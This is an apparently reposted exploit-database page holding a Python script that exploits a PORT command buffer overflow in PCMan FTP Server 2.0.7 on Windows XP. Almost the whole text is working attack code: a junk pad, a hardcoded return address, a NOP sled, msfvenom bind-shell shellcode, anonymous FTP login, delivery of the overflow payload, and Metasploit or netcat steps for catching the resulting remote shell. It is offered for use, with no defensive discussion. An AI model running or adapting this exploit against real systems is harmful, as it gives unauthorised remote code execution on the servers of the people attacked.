PCMan FTP Server 2.0.7 - 'PORT' Command Buffer Overflow
|
来源:vfocus.net 作者:González 发布时间:2016-11-07
|
|
#!/usr/bin/env python #-*- coding: utf-8 -*- # Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit # Author: Pablo González # Date: 4/11/2016 # Software: PCMan 2.0 # Tested on: Windows XP Profesional SP3 Spanish x86 import socket print "Creating malicious input!" junk = '\x41'*2007 ret="\xf7\x56\x3c\x7e" #User32.dll 7E3C56F7 nops = '\x90'*20 #msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c #put shellcode in variable 'sc' sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1" "\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f" "\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18" "\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54" "\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18" "\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a" "\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65" "\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb" "\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac" "\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43" "\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21" "\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76" "\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49" "\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48" "\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1" "\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6" "\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d" "\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59" "\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac" "\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69" "\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70" "\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5" "\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01" "\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a") buffer= junk + ret + nops + sc s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) ip = raw_input('Give me Remote IP Address:') connect=s.connect((ip,21)) banner = s.recv(1024) print banner s.send('USER anonymous\r\n') s.recv(1024) s.send('PASS\r\n') s.recv(1024) #Sending input PORT command (Exploitation is coming) s.send('PORT' + buffer + '\r\n') s.close() #Metasploit exploit/multi/handler or nc <ip> <port> :D # # For exploit/multi/handler # # use exploit/multi/handler # set PAYLOAD windows/shell_bind_tcp # set RHOST <ip> # set LPORT 1144 # exploit # ... # Got it! print "Got it? :D"
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|